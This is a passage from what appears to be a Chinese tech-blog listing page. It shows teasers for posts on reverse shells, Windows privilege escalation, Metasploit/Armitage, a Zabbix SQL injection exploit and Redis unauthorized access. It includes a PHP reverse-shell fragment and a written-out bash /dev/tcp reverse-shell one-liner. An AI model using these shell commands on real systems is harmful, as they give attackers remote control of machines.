array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; i... ...
分类:
系统相关 时间:
2019-07-16 12:24:40
阅读次数:
131
0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payl ...
分类:
系统相关 时间:
2019-05-24 11:09:13
阅读次数:
369
python 反弹shell 我们知道,一般的反弹shell 可以直接使用 base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令 nc nmap 等等。。。。 nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道 ...
分类:
编程语言 时间:
2019-04-24 12:07:01
阅读次数:
321
windows提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。 提权前的准备工作 1, ...
分类:
其他好文 时间:
2019-01-25 01:10:18
阅读次数:
175
上次有小伙伴私信我,想看关于Armitage在Windows平台下的使用,这里简单解释下,Armitage你可以把它看作一个壳,你的所有操作其实还是使用的msfconsole接口的命令行,我也安装过windows下的msf,但实在用的不是很习惯,想想还要自己配开源数据库postgresql,脑瓜疼, ...
分类:
Web程序 时间:
2018-12-30 18:58:16
阅读次数:
200
Windows下的shell原理 经过查阅资料,使用os.dup2(nfd, ofd)的方式重定向socket的输入输出到windows系统的cmd是无法做到的,属于系统原因,不能直接复制Linux下的方案,所以只能写程序收集socket的输入,调用subprocess.Popen去执行,然后获取输 ...
分类:
编程语言 时间:
2018-10-12 21:20:15
阅读次数:
317
零、背景 最近研究了一下之前的反弹shell的python代码块,写了一点代码尝试在LInux下绑定和反弹shell(正反向),看了一些代码,基本是两种思路。1、本地shell的输入输出通过管道与socket的输入输出进行映射。2、socket的指令在agent本地调用命令执行,结果再传回去(但是目 ...
分类:
编程语言 时间:
2018-10-10 14:08:51
阅读次数:
325
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+ + Python Zabbix<3.0.4 SQL注入 Exploitsuccess+ +Zabbix 存在SQL注入漏洞! 管理员 用户名密码:None 管理员 Ses ...
分类:
数据库 时间:
2018-05-18 20:11:57
阅读次数:
1289
01 简介 netcat的主要功能是通过tcp或udp协议传输读写数据。 下面代码用python编写了tcp客户端,服务端,从而实现上传文件,本地执行命令,反弹shell三种功能。 02 代码 ...
分类:
编程语言 时间:
2018-05-13 22:04:35
阅读次数:
175
Redis未授权访问反弹shell 目标主机:10.104.11.178 攻击机:kali 攻击步骤: 1.与目标主机连接 2.kali主机进行监听 3.写入反弹shell语句 4.反弹shell连接成功 ...
分类:
系统相关 时间:
2018-05-03 19:25:07
阅读次数:
1779